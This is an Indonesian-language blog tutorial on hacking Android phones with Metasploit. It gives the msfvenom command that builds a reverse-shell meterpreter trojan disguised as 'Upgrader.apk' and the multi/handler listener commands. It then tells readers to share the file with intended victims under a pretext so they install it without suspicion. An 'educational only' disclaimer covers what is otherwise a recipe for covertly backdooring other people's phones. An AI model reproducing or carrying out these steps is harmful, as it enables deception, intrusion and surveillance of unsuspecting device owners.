Tuesday, January 2, 2018

cara hack android dengan metasploit

hai pada kali ini ane mau berbagi ilmu tentang : CARA HACK ANDROID DENGAN METASPLOIT JARINGAN LOKAL


Discalimer: Tutorial ini hanya untuk tujuan pendidikan dan kami TIDAK bertanggung resiko yang anda lakukan ke orang lain atau anda pribadi.

Baiklah kalau sudah paham dengan discalimer di atas langsung saja ikuti tutorial di bawah sampai selesai dengan teliti.

1.Pertama buka terminal dan buat sebuah trojan dengan format .apk dengan cara memasukan script di bawah


root@kali:~# msfvenom android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk

Ganti LHOST warna merah dengan IP anda sendiri cek nya pake ifconfig



2. Buka Terminal lagi (pada posisi ini kita telah membuka 2 terminal) dan biarkan proses berjalan di terminal pertama, selanjutnya buka metasploit dengan cara ketikan script di bawah ini:


root@kali:~# msfconsole

pict Msf
3.Step ke 3 ini kita akan mengatur permintaan akses dari OS ke android (set-up a listener)

masih dalam msdconsole kita harus membuka Multi-Handler exploit dengan cara, masukan script di bawah ini pada terminal.

root@kali:~# use exploit/multi/handler



4. Mengatur/membuat Payload dengan mengetikan perintah ini di bawah 
root@kali:~# set payload android/meterpreter/reverse_tcp

pernitah di atas menjelaskan bahwa kita akan membuat sebuah payload dengan reverse(yaitu dengan metode rolling, artinya memutar sebuah permintaan agar bisa mendapatkan target dengan mudah

Buat Sebuah HOST (L) dengan mengetikan perintah di bawah ini 
root@kali:~# set LHOST 192.168.0.4

Untuk LHOST usahakan anda set dengan IP anda sendiri bukan dari IP external atau public
5. Exploit.
Cara yang terakhir ini adalah cara yang utama di mana kita akan mengeksekusi target dengan payload yang kita buat tadi dengan exploit.

 
Bagaimana kerja dari teknik exploit ini?  jadi kita terlebih dahulu upload file aplikasi yang tadi kita buat (Upgrade.apk) yang ada pada folder root. Aplikasi tersebut silahkan teman-teman upload di dropbox, kemudian share ke teman-teman atau calon korban anda.

Silahkan buat sebuah alasan sampai korban anda tidak curiga dari awal.

Biarkan Korban memasang aplikasi Upgrader.apk (karena menurutnya ini dimaksudkan untuk meningkatkan beberapa fitur di teleponnya) Namun, pilihan tunjangan untuk pemasangan aplikasi dari Sumber Tak Dikenal harus diaktifkan dari pengaturan keamanan ponsel android agar Trojan dapat di instal.
Dan saat dia membukanya ...

ANDDD BOOM,
kita sudah bisa melihat beberapa isi dari ponselnya.

 
klo sudah terhubung dengan android lawan terserah mau anda lakuin apa aja:v sekian dan terimakasih
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)